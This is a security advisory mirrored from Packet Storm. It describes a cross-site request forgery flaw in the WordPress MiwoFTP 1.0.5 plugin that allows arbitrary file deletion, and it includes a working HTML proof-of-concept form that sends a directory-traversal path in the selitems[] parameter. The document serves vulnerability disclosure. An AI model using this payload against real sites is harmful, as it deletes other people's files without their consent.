Lucene search
K

WordPress MiwoFTP 1.0.5 Cross Site Request Forgery

🗓️ 15 Apr 2015 00:00:00Reported by LiquidWormType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 30 Views

WordPress MiwoFTP 1.0.5 CSRF Arbitrary File Deletio

Code
`  
WordPress MiwoFTP Plugin 1.0.5 CSRF Arbitrary File Deletion Exploit  
  
  
Vendor: Miwisoft LLC  
Product web page: http://www.miwisoft.com  
Affected version: 1.0.5  
  
Summary: MiwoFTP is a smart, fast and lightweight file manager  
plugin that operates from the back-end of WordPress.  
  
Desc: Input passed to the 'selitems[]' parameter is not properly  
sanitised before being used to delete files. This can be exploited  
to delete files with the permissions of the web server using directory  
traversal sequences passed within the affected POST parameter.  
  
Tested on: Apache 2.4.10 (Win32)  
PHP 5.6.3  
MySQL 5.6.21  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2015-5240  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5240.php  
  
Vendor: http://miwisoft.com/wordpress-plugins/miwoftp-wordpress-file-manager#changelog  
  
  
24.03.2015  
  
--  
  
  
<html>  
<body>  
<form action="http://localhost/wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=post" method="POST">  
<input type="hidden" name="do_action" value="delete" />  
<input type="hidden" name="first" value="y" />  
<input type="hidden" name="selitems[]" value="../../../../../pls_mr_jailer_dont_deleteme.txt" />  
<input type="submit" value="Gently" />  
</form>  
</body>  
</html>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation